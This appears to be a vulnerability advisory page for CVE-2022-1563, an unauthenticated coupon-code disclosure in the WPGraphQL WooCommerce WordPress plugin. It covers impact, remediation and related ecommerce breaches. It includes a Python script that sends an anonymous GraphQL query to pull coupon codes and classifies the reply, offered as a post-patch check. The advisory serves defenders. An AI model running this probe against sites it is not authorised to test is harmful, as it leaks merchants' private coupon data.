Attack Vectors
WPGraphQL WooCommerce (slug: wp-graphql-woocommerce) has a medium-severity information disclosure issue (CVSS 5.3) affecting versions up to and including 0.12.3. The CVSS vector (AV:N/PR:N/UI:N) says the attack is network-reachable and needs neither privileges nor user interaction, so an external attacker can target any exposed GraphQL endpoint directly over the internet.
In practical terms, if your WordPress site runs WPGraphQL WooCommerce and its GraphQL endpoint accepts anonymous requests (WPGraphQL serves public queries to unauthenticated clients by default), an unauthenticated actor may be able to query and extract coupon codes. This can be done remotely, at scale, and without logging into a customer or admin account.
Security Weakness
CVE-2022-1563 describes an information exposure weakness in WPGraphQL WooCommerce versions up to, and including, 0.12.3. The plugin fails to restrict access to data that should not be publicly retrievable, so an unauthenticated GraphQL query can return coupon codes.
This is not a “server hack” scenario; it is a missing authorization check on a GraphQL query, in other words a data-access control problem. Business owners should treat it as a governance and revenue-protection issue: sensitive promotional data is accessible in a way your marketing, finance, and compliance teams likely do not intend.
Remediation: Update WPGraphQL WooCommerce to version 0.12.4 or a newer patched version, then confirm from an unauthenticated client that the GraphQL endpoint no longer returns coupon data. If any coupon codes were live while the site was exposed, rotate them. Reference: Wordfence vulnerability advisory.
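The check a site owner would want for both the attack scenario above and the post-update verification: send the coupon query to the endpoint with no cookies or tokens and see whether codes come back. The script below is an added example written for this page; it is not code from the plugin, from Wordfence, or from the original advisory. It assumes the endpoint is at /graphql (WPGraphQL's default route), that the schema exposes a `coupons` connection whose nodes have a `code` field (the field names are an assumption; adjust them to the schema your site actually exposes), and that a patched site answers the anonymous query with an empty connection or a GraphQL error rather than with codes. The sample responses are constructed, not captured from any real site. Run it only against sites you are authorised to test.

```python
"""Anonymous coupon-disclosure probe for a WPGraphQL WooCommerce endpoint.

Added example for this page; not code from the plugin, Wordfence or the
original advisory. Assumptions the page does not state:
  * the site serves GraphQL at /graphql (WPGraphQL's default route);
  * the schema exposes a `coupons` connection whose nodes carry a `code`
    field (field names are an assumption; adjust to your site's schema);
  * a patched site answers the anonymous query with an empty connection or
    a GraphQL error, while a vulnerable one returns the codes.
"""
import json
import urllib.error
import urllib.request
from typing import Any, Dict, List

# Sent with no cookies and no Authorization header on purpose: whatever this
# returns is what any anonymous internet user can read.
COUPON_PROBE_QUERY = """
query CouponProbe {
  coupons(first: 5) {
    nodes {
      code
    }
  }
}
"""


def build_probe_payload() -> bytes:
    """JSON body for the POST; GraphQL servers expect {"query": "..."}."""
    return json.dumps({"query": COUPON_PROBE_QUERY}).encode()


def extract_codes(body: Dict[str, Any]) -> List[str]:
    """Coupon codes present in a GraphQL response, in the order returned."""
    data = body.get("data") or {}
    coupons = data.get("coupons")
    if not isinstance(coupons, dict):
        return []
    nodes = coupons.get("nodes") or []
    return [n["code"] for n in nodes if isinstance(n, dict) and n.get("code")]


def classify_response(body: Dict[str, Any]) -> str:
    """Verdict for one anonymous probe.

    'disclosed' - at least one coupon code came back without authentication
    'denied'    - the connection was empty/null or the server returned errors
    'unknown'   - neither shape matched (different schema, WAF block page, ...)
    """
    if extract_codes(body):
        return "disclosed"
    data = body.get("data") or {}
    if "coupons" in data or body.get("errors"):
        return "denied"
    return "unknown"


def probe(url: str, timeout: float = 10.0) -> str:
    """POST the anonymous query to a site you are authorised to test.

    WPGraphQL normally answers HTTP 200 even for GraphQL errors, but a
    4xx/5xx body is still parsed so an authorization error is classified
    rather than raised.
    """
    req = urllib.request.Request(
        url,
        data=build_probe_payload(),
        headers={"Content-Type": "application/json", "Accept": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            raw = resp.read()
    except urllib.error.HTTPError as err:
        raw = err.read()
    try:
        return classify_response(json.loads(raw.decode("utf-8", "replace")))
    except ValueError:
        return "unknown"  # not JSON at all: login page, WAF block page, etc.


# Constructed sample responses (not captured from any real site) covering the
# outcomes the check distinguishes.
SAMPLE_VULNERABLE = {"data": {"coupons": {"nodes": [{"code": "spring25"}, {"code": "vip-50"}]}}}
SAMPLE_PATCHED_EMPTY = {"data": {"coupons": {"nodes": []}}}
SAMPLE_PATCHED_ERROR = {
    "errors": [{"message": "Not authorized to access this resource."}],
    "data": {"coupons": None},
}
SAMPLE_OTHER_SCHEMA = {"data": {"products": {"nodes": []}}}

if __name__ == "__main__":
    for name, sample in (
        ("vulnerable", SAMPLE_VULNERABLE),
        ("patched-empty", SAMPLE_PATCHED_EMPTY),
        ("patched-error", SAMPLE_PATCHED_ERROR),
        ("other-schema", SAMPLE_OTHER_SCHEMA),
    ):
        print(f"{name:14} -> {classify_response(sample)}")
    # Live use against your own site, e.g.:
    # print(probe("https://shop.example.test/graphql"))
```

A "disclosed" verdict before the update confirms exposure; the same probe returning "denied" after updating to 0.12.4 is the confirmation step from the remediation note. An "unknown" verdict usually means the schema differs from the assumed one or something in front of WordPress (a WAF or login redirect) answered instead, so inspect the raw response before drawing a conclusion.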
Technical or Business Impacts
Revenue leakage and margin erosion: If attackers extract coupon codes, they can be shared publicly or abused programmatically, leading to unexpected discounting, reduced campaign ROI, and complications in forecasting and revenue recognition.
Campaign disruption and brand risk: Marketing teams may have to pause or rework promotions, rotate codes, and respond to customer confusion if “private” codes spread widely. Even when no customer PII is exposed, customers and partners may perceive the incident as a loss of control over your ecommerce operations.
Fraud operations and operational overhead: Abuse of coupon codes can create spikes in low-margin orders, increase support tickets (pricing disputes, cancellations), and add burden to finance and operations teams for reconciliation and post-incident analysis.
Similar Attacks
While this vulnerability is specifically about coupon-code disclosure via GraphQL, it fits a broader pattern: attackers target ecommerce platforms for data exposure and monetizable abuse. Examples of real-world ecommerce-focused attacks include:
British Airways (Magecart-style card-skimming attack; ICO enforcement)
Ticketmaster UK (third-party script compromise impacting customer data; ICO enforcement)
Newegg (payment card skimming malware; KrebsOnSecurity)